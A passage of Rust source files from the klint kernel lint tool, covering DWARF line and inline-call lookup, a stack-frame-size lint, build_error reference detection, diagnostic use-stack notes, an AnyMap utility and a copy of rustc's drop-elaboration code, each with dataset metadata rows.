Ok(begin..begin.wrapping_add(len as _))
})
.collect::<Result<_, _>>()?;
Ok((encoded_section, ranges))
}
fn call_location(
&self,
unit: &Unit<ReaderTy<'_>>,
die: &DebuggingInformationEntry<'_, '_, ReaderTy<'_>>,
) -> Result<Option<Location>, Error> {
let Some(file) = die.attr(gimli::DW_AT_call_file)? else {
// This may happen when two calls from different files are merged.
return Ok(None);
};
let file = self.file_name(
unit,
unit.line_program
.as_ref()
.ok_or(Error::UnexpectedDwarf("line number table not present"))?
.header(),
file.udata_value()
.ok_or(Error::UnexpectedDwarf("file number is not udata"))?,
)?;
let Some(line) = die.attr(gimli::DW_AT_call_line)? else {
// This may happen when two calls from different lines are merged.
return Ok(None);
};
let line = line
.udata_value()
.ok_or(Error::UnexpectedDwarf("line number is not udata"))?;
let column = match die.attr(gimli::DW_AT_call_column)? {
None => 0,
Some(column) => column
.udata_value()
.ok_or(Error::UnexpectedDwarf("column number is not udata"))?,
};
Ok(Some(Location { file, line, column }))
}
pub fn inline_info<'tcx>(
&self,
section_index: SectionIndex,
offset: u64,
) -> Result<Vec<Call>, Error> {
let mut iter = self.dwarf.units();
let mut callstack = Vec::<Call>::new();
while let Some(header) = iter.next()? {
let unit = self.dwarf.unit(header)?;
let mut stack = Vec::new();
let mut entries = unit.entries();
while let Some((depth, die)) = entries.next_dfs()? {
for _ in depth..=0 {
stack.pop();
}
if matches!(
die.tag(),
gimli::DW_TAG_subprogram | gimli::DW_TAG_inlined_subroutine
) {
stack.push(Some(self.linkage_name(&unit, die)?));
} else {
stack.push(None);
}
if die.tag() != gimli::DW_TAG_inlined_subroutine {
continue;
}
let ranges = self.ranges(&unit, die)?;
if ranges.0 != section_index {
continue;
}
if ranges
.1
.iter()
.any(|range| range.contains(&(offset as i64)))
{
let callee = stack.last().unwrap().as_ref().unwrap();
let caller = stack
.iter()
.rev()
.skip(1)
.find(|x| x.is_some())
.and_then(|x| x.as_ref())
.ok_or(Error::UnexpectedDwarf(
"DW_TAG_inlined_subroutine is not nested inside DW_TAG_subprogram",
))?;
// Call stack must form a chain.
if let Some(last_call) = callstack.last() {
if last_call.callee != *caller {
Err(Error::UnexpectedDwarf("Inlined call does not form a chain"))?
}
}
let location = self.call_location(&unit, die)?;
callstack.push(Call {
caller: caller.clone(),
callee: callee.clone(),
location,
});
}
}
}
Ok(callstack)
}
fn file_name(
&self,
unit: &Unit<ReaderTy<'_>>,
line: &LineProgramHeader<ReaderTy<'_>>,
index: u64,
) -> Result<PathBuf, Error> {
let file = line.file(index).ok_or(Error::UnexpectedDwarf(
"debug_lines referenced non-existent file",
))?;
let mut path = PathBuf::new();
if file.directory_index() != 0 {
let directory = file.directory(line).ok_or(Error::UnexpectedDwarf(
"debug_lines referenced non-existent directory",
))?;
path.push(self.dwarf().attr_string(unit, directory)?.to_string()?);
}
path.push(
self.dwarf()
.attr_string(unit, file.path_name())?
.to_string()?,
);
Ok(path)
}
pub fn locate<'tcx>(
&self,
section_index: SectionIndex,
offset: u64,
) -> Result<Option<Location>, Error> {
// FIXME: should this be optimized?
let mut iter = self.dwarf.units();
while let Some(header) = iter.next()? {
let mut unit = self.dwarf.unit(header)?;
let mut prev: Option<(_, LineRow)> = None;
if let Some(ilnp) = unit.line_program.take() {
let mut rows = ilnp.rows();
while let Some((_, row)) = rows.next_row()? {
let row = *row;
let encoded_address = row.address();
let (encoded_section, encoded_offset) =
self.section_layout.decode(encoded_address)?;
// Skip over sections that we don't care about.
if encoded_section != section_index {
continue;
}
if let Some((prev_addr, prev_row)) = prev
&& prev_row.line().is_some()
&& (prev_addr..encoded_offset).contains(&(offset as i64))
{
let file = self.file_name(&unit, rows.header(), prev_row.file_index())?;
let line = prev_row.line().map_or(0, NonZero::get);
let column = match prev_row.column() {
gimli::ColumnType::LeftEdge => 0,
gimli::ColumnType::Column(v) => v.get(),
};
return Ok(Some(Location { file, line, column }));
}
if row.end_sequence() {
prev = None;
} else {
prev = Some((encoded_offset, row));
}
}
}
}
Ok(None)
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/binary_analysis/stack_size.rs | src/binary_analysis/stack_size.rs | use iced_x86::{Decoder, DecoderOptions, Mnemonic, OpKind, Register};
use object::{Architecture, File, Object, ObjectSection, SectionKind};
use rustc_data_structures::fx::FxHashSet;
use rustc_errors::{Diag, Diagnostic, Level};
use rustc_hir::CRATE_HIR_ID;
use rustc_middle::mir::mono::MonoItem;
use rustc_middle::ty::Instance;
use rustc_session::declare_tool_lint;
use rustc_span::{Span, Symbol, sym};
use crate::ctxt::AnalysisCtxt;
declare_tool_lint! {
//// The `stack_frame_too_large` lint detects large stack frames that may potentially
/// lead to stack overflow.
pub klint::STACK_FRAME_TOO_LARGE,
Allow,
"frame size is too large"
}
#[derive(Diagnostic)]
#[diag(klint_stack_frame_limit_missing)]
#[help(klint_stack_frame_limit_help)]
struct StackFrameLimitMissing {
#[primary_span]
pub span: Span,
pub default: u32,
}
#[derive(Diagnostic)]
#[diag(klint_stack_frame_limit_invalid)]
#[help(klint_stack_frame_limit_help)]
struct StackFrameLimitInvalid {
#[primary_span]
pub span: Span,
pub setting: Symbol,
}
#[derive(Diagnostic)]
#[diag(klint_stack_frame_too_large)]
#[note]
struct StackFrameTooLarge<'a, 'tcx> {
pub section: &'a str,
pub offset: u64,
pub insn: String,
pub stack_size: u64,
pub frame_limit: u64,
#[primary_span]
pub span: Span,
pub instance: Instance<'tcx>,
}
pub fn stack_size_check<'tcx, 'obj>(cx: &AnalysisCtxt<'tcx>, file: &File<'obj>) {
let lint_cfg = cx.lint_level_at_node(STACK_FRAME_TOO_LARGE, CRATE_HIR_ID);
// Given inlining and cross-crate monomorphization happening, it does not make
// a lot of sense to define this lint on anywhere except codegen unit level. So
// just take levels from the crate root.
let level = match lint_cfg.level {
// Don't run any of the checks if the lint is allowed.
// This is one of the more expensive checks.
//
// NOTE: `expect` is actually not supported as this check is too late.
// But we need to match it so treat like `allow` anyway.
rustc_lint::Level::Allow | rustc_lint::Level::Expect => return,
rustc_lint::Level::Warn => Level::Warning,
rustc_lint::Level::ForceWarn => Level::ForceWarning,
rustc_lint::Level::Deny | rustc_lint::Level::Forbid => Level::Error,
};
// Obtain the stack size limit.
// Ideally we support `#![klint::stack_frame_size_limit = 4096]`, but this is not yet stable
// (custom_inner_attributes).
// Instead, we find via `CONFIG_FRAME_WARN` cfg.
let frame_limit_sym = cx
.sess
.psess
.config
.iter()
.copied()
.find(|&(k, v)| k == crate::symbol::CONFIG_FRAME_WARN && v.is_some())
.map(|(_, v)| v.unwrap())
.unwrap_or(sym::empty);
let frame_limit = if frame_limit_sym.is_empty() {
cx.dcx().emit_warn(StackFrameLimitMissing {
span: lint_cfg.src.span(),
default: 2048,
});
2048
} else if let Ok(v) = frame_limit_sym.as_str().parse() {
v
} else {
cx.dcx().emit_err(StackFrameLimitInvalid {
span: lint_cfg.src.span(),
setting: frame_limit_sym,
});
return;
};
// Currently only x64 is supported for this lint.
if file.architecture() != Architecture::X86_64 {
return;
}
for section in file.sections() {
// Only check text sections.
if !matches!(section.kind(), SectionKind::Text) {
continue;
}
let data = section.uncompressed_data().unwrap();
let decoder = Decoder::with_ip(64, &data, 0, DecoderOptions::NONE);
let mut linted = FxHashSet::default();
for insn in decoder {
if insn.mnemonic() == Mnemonic::Sub
&& insn.op0_kind() == OpKind::Register
&& insn.op0_register() == Register::RSP
&& let Ok(stack_size) = insn.try_immediate(1)
{
if stack_size < frame_limit {
continue;
}
let offset = insn.ip();
let Some((symbol, _)) =
super::find_symbol_from_section_offset(file, §ion, offset)
else {
continue;
};
let Some(MonoItem::Fn(instance)) = cx.symbol_name_to_mono(symbol) else {
continue;
};
if !linted.insert(instance) {
continue;
}
let diag: Diag<'_, ()> = StackFrameTooLarge {
section: section.name().unwrap(),
offset,
insn: insn.to_string(),
stack_size,
frame_limit,
span: cx.def_span(instance.def_id()),
instance,
}
.into_diag(cx.dcx(), level);
diag.emit();
}
}
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/binary_analysis/build_error.rs | src/binary_analysis/build_error.rs | use object::{File, Object, ObjectSection, ObjectSymbol, RelocationTarget};
use rustc_middle::mir::mono::MonoItem;
use rustc_middle::ty::{Instance, TypingEnv};
use rustc_span::Span;
use crate::ctxt::AnalysisCtxt;
use crate::diagnostic::use_stack::{UseSite, UseSiteKind};
#[derive(Diagnostic)]
#[diag(klint_build_error_referenced_without_symbol)]
struct BuildErrorReferencedWithoutSymbol;
#[derive(Diagnostic)]
#[diag(klint_build_error_referenced_without_instance)]
struct BuildErrorReferencedWithoutInstance<'a> {
pub symbol: &'a str,
}
#[derive(Diagnostic)]
#[diag(klint_build_error_referenced_without_debug)]
#[note]
struct BuildErrorReferencedWithoutDebug<'tcx> {
#[primary_span]
pub span: Span,
pub kind: &'static str,
pub instance: Instance<'tcx>,
pub err: String,
}
#[derive(Diagnostic)]
#[diag(klint_build_error_referenced)]
struct BuildErrorReferenced;
pub fn build_error_detection<'tcx, 'obj>(cx: &AnalysisCtxt<'tcx>, file: &File<'obj>) {
let Some(build_error) = cx.get_klint_diagnostic_item(crate::symbol::build_error) else {
return;
};
let build_error_symbol_name = cx.symbol_name(Instance::mono(cx.tcx, build_error)).name;
let Some(build_error_symbol) = file.symbol_by_name(build_error_symbol_name) else {
// This object file contains no reference to `build_error`, all good!
return;
};
// This object file defines this symbol; in which case we're codegenning for `build_error` crate.
// Nothing to do.
if !build_error_symbol.is_undefined() {
return;
}
let relo_target_needle = RelocationTarget::Symbol(build_error_symbol.index());
// Now this file contains reference to `build_error`, this is not expected.
// We need to figure out why it is being generated.
for section in file.sections() {
for (offset, relocation) in section.relocations() {
if relocation.target() == relo_target_needle {
// Found a relocation that points to `build_error`. Emit an error.
let Some((symbol, _)) =
super::find_symbol_from_section_offset(file, §ion, offset)
else {
cx.dcx().emit_err(BuildErrorReferencedWithoutSymbol);
continue;
};
let Some(mono) = cx.symbol_name_to_mono(symbol) else {
cx.dcx()
.emit_err(BuildErrorReferencedWithoutInstance { symbol });
continue;
};
let loader = super::dwarf::DwarfLoader::new(file)
.expect("DWARF loader creation should not fail");
let mut diag = cx.dcx().create_err(BuildErrorReferenced);
let mut frame = match mono {
MonoItem::Fn(instance) => instance,
MonoItem::Static(def_id) => Instance::mono(cx.tcx, def_id),
MonoItem::GlobalAsm(_) => bug!(),
};
let mut recovered_call_stack = Vec::new();
let result: Result<_, super::dwarf::Error> = try {
let call_stack = loader.inline_info(section.index(), offset)?;
if let Some(first) = call_stack.first() {
if first.caller != symbol {
Err(super::dwarf::Error::UnexpectedDwarf(
"root of call stack is unexpected",
))?
}
}
for call in call_stack {
if let Some((callee, site)) = super::reconstruct::recover_fn_call_span(
cx.tcx,
frame,
&call.callee,
call.location.as_ref(),
) {
recovered_call_stack.push(UseSite {
instance: TypingEnv::fully_monomorphized().as_query_input(frame),
kind: site,
});
frame = callee;
}
}
};
if let Err(err) = result {
diag.note(format!(
"attempt to reconstruct inline information from DWARF failed: {err}"
));
}
let result: Result<_, super::dwarf::Error> = try {
let loc = loader.locate(section.index(), offset)?.ok_or(
super::dwarf::Error::UnexpectedDwarf("cannot find line number info"),
)?;
if let Some((_, site)) = super::reconstruct::recover_fn_call_span(
cx.tcx,
frame,
build_error_symbol_name,
Some(&loc),
) {
recovered_call_stack.push(UseSite {
instance: TypingEnv::fully_monomorphized().as_query_input(frame),
kind: site,
});
} else {
let span = super::reconstruct::recover_span_from_line_no(cx.tcx, &loc)
.ok_or(super::dwarf::Error::Other(
"cannot find file in compiler session",
))?;
recovered_call_stack.push(UseSite {
instance: TypingEnv::fully_monomorphized().as_query_input(frame),
kind: UseSiteKind::Other(
span,
"which is referenced by this function".to_string(),
),
})
}
};
if let Err(err) = result {
diag.cancel();
// If even line number cannot be recovered, emit a different diagnostic.
cx.dcx().emit_err(match mono {
MonoItem::Fn(instance) => BuildErrorReferencedWithoutDebug {
span: cx.def_span(instance.def_id()),
kind: "fn",
instance,
err: err.to_string(),
},
MonoItem::Static(def_id) => BuildErrorReferencedWithoutDebug {
span: cx.def_span(def_id),
kind: "static",
instance: Instance::mono(cx.tcx, def_id),
err: err.to_string(),
},
MonoItem::GlobalAsm(_) => {
// We're not going to be covered by symbols inside global asm.
bug!();
}
});
continue;
}
cx.note_use_stack(&mut diag, &recovered_call_stack);
diag.span_note(
cx.def_span(mono.def_id()),
format!("reference contained in `{}`", mono),
);
diag.emit();
}
}
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/binary_analysis/mod.rs | src/binary_analysis/mod.rs | use std::fs::File;
use std::path::Path;
use object::{File as ObjectFile, Object, ObjectSection, ObjectSymbol, Section, SymbolSection};
use crate::ctxt::AnalysisCtxt;
mod build_error;
mod dwarf;
mod reconstruct;
pub(crate) mod stack_size;
pub fn binary_analysis<'tcx>(cx: &AnalysisCtxt<'tcx>, path: &Path) {
let file = File::open(path).unwrap();
let mmap = unsafe { rustc_data_structures::memmap::Mmap::map(file) }.unwrap();
let object = ObjectFile::parse(&*mmap).unwrap();
build_error::build_error_detection(cx, &object);
stack_size::stack_size_check(cx, &object);
}
fn find_symbol_from_section_offset<'obj>(
file: &ObjectFile<'obj>,
section: &Section<'_, 'obj>,
offset: u64,
) -> Option<(&'obj str, u64)> {
let section_needle = SymbolSection::Section(section.index());
for sym in file.symbols() {
if sym.section() != section_needle {
continue;
}
let start = sym.address();
let end = start + sym.size();
if (start..end).contains(&offset) {
if let Ok(name) = sym.name() {
return Some((name, offset - start));
}
}
}
None
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/utils/anymap.rs | src/utils/anymap.rs | use std::any::{Any, TypeId};
use std::collections::hash_map as map;
use std::marker::{PhantomData, Unsize};
use rustc_data_structures::fx::FxHashMap;
/// Map that can store data for arbitrary types.
pub struct AnyMap<U: ?Sized> {
// This is basically `FxHashMap<TypeId, Box<dyn Any>>`
//
// The generic `U` is present to capture auto trait bounds.
map: FxHashMap<TypeId, Box<U>>,
}
pub struct OccupiedEntry<'a, U: ?Sized, T> {
entry: map::OccupiedEntry<'a, TypeId, Box<U>>,
phantom: PhantomData<T>,
}
impl<'a, U: Any + ?Sized + 'static, T: 'static> OccupiedEntry<'a, U, T> {
pub fn into_mut(self) -> &'a mut T
where
T: Unsize<U>,
{
let any_ref = &mut **self.entry.into_mut();
debug_assert_eq!((*any_ref).type_id(), TypeId::of::<T>());
// SAFETY: by type invariant, `any_ref` is a `&mut T`.
unsafe { &mut *(any_ref as *mut U as *mut T) }
}
}
pub struct VacantEntry<'a, U: ?Sized, T> {
entry: map::VacantEntry<'a, TypeId, Box<U>>,
phantom: PhantomData<T>,
}
impl<'a, U: Any + ?Sized, T> VacantEntry<'a, U, T> {
pub fn insert(self, value: T) -> &'a mut T
where
T: Unsize<U>,
{
let any_ref = &mut **self.entry.insert(Box::new(value) as _);
// SAFETY: we just inserted it and we know the type is `Box<T>`.
unsafe { &mut *(any_ref as *mut U as *mut T) }
}
}
pub enum Entry<'a, U: ?Sized, T> {
Occupied(OccupiedEntry<'a, U, T>),
Vacant(VacantEntry<'a, U, T>),
}
impl<'a, U: Any + ?Sized, T: 'static> Entry<'a, U, T> {
pub fn or_insert_with<F: FnOnce() -> T>(self, default: F) -> &'a mut T
where
T: Unsize<U>,
{
match self {
Entry::Occupied(entry) => entry.into_mut(),
Entry::Vacant(entry) => entry.insert(default()),
}
}
}
impl<U: ?Sized> Default for AnyMap<U> {
fn default() -> Self {
Self::new()
}
}
impl<U: ?Sized> AnyMap<U> {
pub fn new() -> Self {
Self {
map: Default::default(),
}
}
}
impl<U: Any + ?Sized> AnyMap<U> {
pub fn entry<T: 'static>(&mut self) -> Entry<'_, U, T> {
match self.map.entry(TypeId::of::<T>()) {
map::Entry::Occupied(entry) => Entry::Occupied(OccupiedEntry {
entry,
phantom: PhantomData,
}),
map::Entry::Vacant(entry) => Entry::Vacant(VacantEntry {
entry,
phantom: PhantomData,
}),
}
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/utils/mod.rs | src/utils/mod.rs | pub mod anymap;
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/diagnostic/mod.rs | src/diagnostic/mod.rs | pub(crate) mod use_stack;
use rustc_middle::ty::PseudoCanonicalInput;
pub struct PolyDisplay<'a, 'tcx, T>(pub &'a PseudoCanonicalInput<'tcx, T>);
impl<T> std::fmt::Display for PolyDisplay<'_, '_, T>
where
T: std::fmt::Display + Copy,
{
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let PseudoCanonicalInput { typing_env, value } = self.0;
write!(f, "{}", value)?;
if !typing_env.param_env.caller_bounds().is_empty() {
write!(f, " where ")?;
for (i, predicate) in typing_env.param_env.caller_bounds().iter().enumerate() {
if i > 0 {
write!(f, ", ")?;
}
write!(f, "{}", predicate)?;
}
}
Ok(())
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/diagnostic/use_stack.rs | src/diagnostic/use_stack.rs | //! Utility for generating diagnostic information that involves chains.
//!
//! For example, when giving context about why a specific instance is used, a call stack (or rather, use stack,
//! as some usage may be due to pointer coercion or static reference).
use rustc_errors::{Diag, EmissionGuarantee, MultiSpan};
use rustc_hir::LangItem;
use rustc_hir::def_id::DefId;
use rustc_middle::ty::{GenericArgs, Instance, PseudoCanonicalInput, TypingEnv};
use rustc_span::{Span, sym};
use crate::ctxt::AnalysisCtxt;
use crate::diagnostic::PolyDisplay;
#[derive(Debug)]
pub enum UseSiteKind {
/// Used due to a direct function call.
Call(Span),
/// Used due to a variable drop.
Drop {
/// Span that causes the drop.
drop_span: Span,
/// Span of the place being dropped.
place_span: Span,
},
/// A function is used when it is coerced into a function pointer.
PointerCoercion(Span),
/// A function is used as it is a trait method and the trait vtable is constructed.
Vtable(Span),
/// Some other type of usage.
Other(Span, String),
}
impl UseSiteKind {
pub fn span(&self) -> Span {
match self {
UseSiteKind::Call(span)
| UseSiteKind::Drop {
drop_span: span,
place_span: _,
}
| UseSiteKind::PointerCoercion(span)
| UseSiteKind::Vtable(span)
| UseSiteKind::Other(span, _) => *span,
}
}
pub fn multispan(&self) -> MultiSpan {
match self {
UseSiteKind::Call(span)
| UseSiteKind::PointerCoercion(span)
| UseSiteKind::Vtable(span)
| UseSiteKind::Other(span, _) => MultiSpan::from_span(*span),
UseSiteKind::Drop {
drop_span,
place_span,
} => {
let mut multispan = MultiSpan::from_span(*drop_span);
multispan.push_span_label(*place_span, "value being dropped is here");
multispan
}
}
}
}
#[derive(Debug)]
pub struct UseSite<'tcx> {
/// A instance that makes the use.
pub instance: PseudoCanonicalInput<'tcx, Instance<'tcx>>,
/// A specific use occured in the instance.
pub kind: UseSiteKind,
}
impl<'tcx> AnalysisCtxt<'tcx> {
/// Obtain the polymorphic instance of `def_id`.
fn poly_instance_of_def_id(&self, def_id: DefId) -> PseudoCanonicalInput<'tcx, Instance<'tcx>> {
let poly_typing_env = TypingEnv::post_analysis(self.tcx, def_id);
let poly_args =
self.erase_and_anonymize_regions(GenericArgs::identity_for_item(self.tcx, def_id));
poly_typing_env.as_query_input(Instance::new_raw(def_id, poly_args))
}
/// Determine if the instance is fully polymorphic, or if it is already specialized.
fn is_fully_polymorphic(&self, instance: PseudoCanonicalInput<'tcx, Instance<'tcx>>) -> bool {
self.poly_instance_of_def_id(instance.value.def_id()) == instance
}
pub fn note_use_stack<G: EmissionGuarantee>(
&self,
diag: &mut Diag<'tcx, G>,
use_stack: &[UseSite<'tcx>],
) {
for site in use_stack.iter().rev() {
let def_id = site.instance.value.def_id();
if self.is_lang_item(def_id, LangItem::DropInPlace) {
let ty = site.instance.value.args[0];
diag.note(format!("which is called from drop glue of `{ty}`"));
continue;
}
// Hide `drop()` call from stack as it's mostly noise.
if self.is_diagnostic_item(sym::mem_drop, def_id) {
continue;
}
if diag.span.is_dummy() {
diag.span = site.kind.multispan();
} else {
match &site.kind {
UseSiteKind::Call(span) => {
diag.span_note(*span, "which is called from here");
}
UseSiteKind::Drop {
drop_span,
place_span,
} => {
let mut multispan = MultiSpan::from_span(*drop_span);
multispan.push_span_label(*place_span, "value being dropped is here");
diag.span_note(multispan, "which is dropped here");
}
UseSiteKind::PointerCoercion(span) => {
diag.span_note(*span, "which is used as a pointer here");
}
UseSiteKind::Vtable(span) => {
diag.span_note(*span, "which is used as a vtable here");
}
UseSiteKind::Other(span, other) => {
diag.span_note(*span, other.clone());
}
}
}
if !self.is_fully_polymorphic(site.instance) {
diag.note(format!("inside instance `{}`", PolyDisplay(&site.instance)));
}
}
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/mir/elaborate_drop.rs | src/mir/elaborate_drop.rs | #![allow(dead_code)]
// From rustc_mir_transform/src/elaborate_drop.rs
// Needed because they're `pub(crate)`
use std::{fmt, iter, mem};
use rustc_abi::{FIRST_VARIANT, FieldIdx, VariantIdx};
use rustc_hir::def::DefKind;
use rustc_hir::lang_items::LangItem;
use rustc_index::Idx;
use rustc_middle::mir::*;
use rustc_middle::ty::adjustment::PointerCoercion;
use rustc_middle::ty::util::IntTypeExt;
use rustc_middle::ty::{self, GenericArg, GenericArgsRef, Ty, TyCtxt};
use rustc_middle::{span_bug, traits};
use rustc_span::DUMMY_SP;
use rustc_span::source_map::{Spanned, dummy_spanned};
use tracing::{debug, instrument};
use super::patch::MirPatch;
/// Describes how/if a value should be dropped.
#[derive(Debug)]
pub(crate) enum DropStyle {
/// The value is already dead at the drop location, no drop will be executed.
Dead,
/// The value is known to always be initialized at the drop location, drop will always be
/// executed.
Static,
/// Whether the value needs to be dropped depends on its drop flag.
Conditional,
/// An "open" drop is one where only the fields of a value are dropped.
///
/// For example, this happens when moving out of a struct field: The rest of the struct will be
/// dropped in such an "open" drop. It is also used to generate drop glue for the individual
/// components of a value, for example for dropping array elements.
Open,
}
/// Which drop flags to affect/check with an operation.
#[derive(Debug)]
pub(crate) enum DropFlagMode {
/// Only affect the top-level drop flag, not that of any contained fields.
Shallow,
/// Affect all nested drop flags in addition to the top-level one.
Deep,
}
/// Describes if unwinding is necessary and where to unwind to if a panic occurs.
#[derive(Copy, Clone, Debug)]
pub(crate) enum Unwind {
/// Unwind to this block.
To(BasicBlock),
/// Already in an unwind path, any panic will cause an abort.
InCleanup,
}
impl Unwind {
fn is_cleanup(self) -> bool {
match self {
Unwind::To(..) => false,
Unwind::InCleanup => true,
}
}
fn into_action(self) -> UnwindAction {
match self {
Unwind::To(bb) => UnwindAction::Cleanup(bb),
Unwind::InCleanup => UnwindAction::Terminate(UnwindTerminateReason::InCleanup),
}
}
fn map<F>(self, f: F) -> Self
where
F: FnOnce(BasicBlock) -> BasicBlock,
{
match self {
Unwind::To(bb) => Unwind::To(f(bb)),
Unwind::InCleanup => Unwind::InCleanup,
}
}
}
pub(crate) trait DropElaborator<'a, 'tcx>: fmt::Debug {
/// The type representing paths that can be moved out of.
///
/// Users can move out of individual fields of a struct, such as `a.b.c`. This type is used to
/// represent such move paths. Sometimes tracking individual move paths is not necessary, in
/// which case this may be set to (for example) `()`.
type Path: Copy + fmt::Debug;
// Accessors
fn patch_ref(&self) -> &MirPatch<'tcx>;
fn patch(&mut self) -> &mut MirPatch<'tcx>;
fn body(&self) -> &'a Body<'tcx>;
fn tcx(&self) -> TyCtxt<'tcx>;
fn typing_env(&self) -> ty::TypingEnv<'tcx>;
fn allow_async_drops(&self) -> bool;
fn terminator_loc(&self, bb: BasicBlock) -> Location;
// Drop logic
/// Returns how `path` should be dropped, given `mode`.
fn drop_style(&self, path: Self::Path, mode: DropFlagMode) -> DropStyle;
/// Returns the drop flag of `path` as a MIR `Operand` (or `None` if `path` has no drop flag).
fn get_drop_flag(&mut self, path: Self::Path) -> Option<Operand<'tcx>>;
/// Modifies the MIR patch so that the drop flag of `path` (if any) is cleared at `location`.
///
/// If `mode` is deep, drop flags of all child paths should also be cleared by inserting
/// additional statements.
fn clear_drop_flag(&mut self, location: Location, path: Self::Path, mode: DropFlagMode);
// Subpaths
/// Returns the subpath of a field of `path` (or `None` if there is no dedicated subpath).
///
/// If this returns `None`, `field` will not get a dedicated drop flag.
fn field_subpath(&self, path: Self::Path, field: FieldIdx) -> Option<Self::Path>;
/// Returns the subpath of a dereference of `path` (or `None` if there is no dedicated subpath).
///
/// If this returns `None`, `*path` will not get a dedicated drop flag.
///
/// This is only relevant for `Box<T>`, where the contained `T` can be moved out of the box.
fn deref_subpath(&self, path: Self::Path) -> Option<Self::Path>;
/// Returns the subpath of downcasting `path` to one of its variants.
///
/// If this returns `None`, the downcast of `path` will not get a dedicated drop flag.
fn downcast_subpath(&self, path: Self::Path, variant: VariantIdx) -> Option<Self::Path>;
/// Returns the subpath of indexing a fixed-size array `path`.
///
/// If this returns `None`, elements of `path` will not get a dedicated drop flag.
///
/// This is only relevant for array patterns, which can move out of individual array elements.
fn array_subpath(&self, path: Self::Path, index: u64, size: u64) -> Option<Self::Path>;
}
#[derive(Debug)]
struct DropCtxt<'a, 'b, 'tcx, D>
where
D: DropElaborator<'b, 'tcx>,
{
elaborator: &'a mut D,
source_info: SourceInfo,
place: Place<'tcx>,
path: D::Path,
succ: BasicBlock,
unwind: Unwind,
dropline: Option<BasicBlock>,
}
/// "Elaborates" a drop of `place`/`path` and patches `bb`'s terminator to execute it.
///
/// The passed `elaborator` is used to determine what should happen at the drop terminator. It
/// decides whether the drop can be statically determined or whether it needs a dynamic drop flag,
/// and whether the drop is "open", ie. should be expanded to drop all subfields of the dropped
/// value.
///
/// When this returns, the MIR patch in the `elaborator` contains the necessary changes.
pub(crate) fn elaborate_drop<'b, 'tcx, D>(
elaborator: &mut D,
source_info: SourceInfo,
place: Place<'tcx>,
path: D::Path,
succ: BasicBlock,
unwind: Unwind,
bb: BasicBlock,
dropline: Option<BasicBlock>,
) where
D: DropElaborator<'b, 'tcx>,
'tcx: 'b,
{
DropCtxt {
elaborator,
source_info,
place,
path,
succ,
unwind,
dropline,
}
.elaborate_drop(bb)
}
impl<'a, 'b, 'tcx, D> DropCtxt<'a, 'b, 'tcx, D>
where
D: DropElaborator<'b, 'tcx>,
'tcx: 'b,
{
#[instrument(level = "trace", skip(self), ret)]
fn place_ty(&self, place: Place<'tcx>) -> Ty<'tcx> {
if place.local < self.elaborator.body().local_decls.next_index() {
place.ty(self.elaborator.body(), self.tcx()).ty
} else {
// We don't have a slice with all the locals, since some are in the patch.
PlaceTy::from_ty(self.elaborator.patch_ref().local_ty(place.local))
.multi_projection_ty(self.elaborator.tcx(), place.projection)
.ty
}
}
fn tcx(&self) -> TyCtxt<'tcx> {
self.elaborator.tcx()
}
// Generates three blocks:
// * #1:pin_obj_bb: call Pin<ObjTy>::new_unchecked(&mut obj)
// * #2:call_drop_bb: fut = call obj.<AsyncDrop::drop>() OR call async_drop_in_place<T>(obj)
// * #3:drop_term_bb: drop (obj, fut, ...)
// We keep async drop unexpanded to poll-loop here, to expand it later, at StateTransform -
// into states expand.
// call_destructor_only - to call only AsyncDrop::drop, not full async_drop_in_place glue
fn build_async_drop(
&mut self,
place: Place<'tcx>,
drop_ty: Ty<'tcx>,
bb: Option<BasicBlock>,
succ: BasicBlock,
unwind: Unwind,
dropline: Option<BasicBlock>,
call_destructor_only: bool,
) -> BasicBlock {
let tcx = self.tcx();
let span = self.source_info.span;
let pin_obj_bb = bb.unwrap_or_else(|| {
self.elaborator.patch().new_block(BasicBlockData::new(
Some(Terminator {
// Temporary terminator, will be replaced by patch
source_info: self.source_info,
kind: TerminatorKind::Return,
}),
false,
))
});
let (fut_ty, drop_fn_def_id, trait_args) = if call_destructor_only {
// Resolving obj.<AsyncDrop::drop>()
let trait_ref = ty::TraitRef::new(
tcx,
tcx.require_lang_item(LangItem::AsyncDrop, span),
[drop_ty],
);
let (drop_trait, trait_args) = match tcx.codegen_select_candidate(
ty::TypingEnv::fully_monomorphized().as_query_input(trait_ref),
) {
Ok(traits::ImplSource::UserDefined(traits::ImplSourceUserDefinedData {
impl_def_id,
args,
..
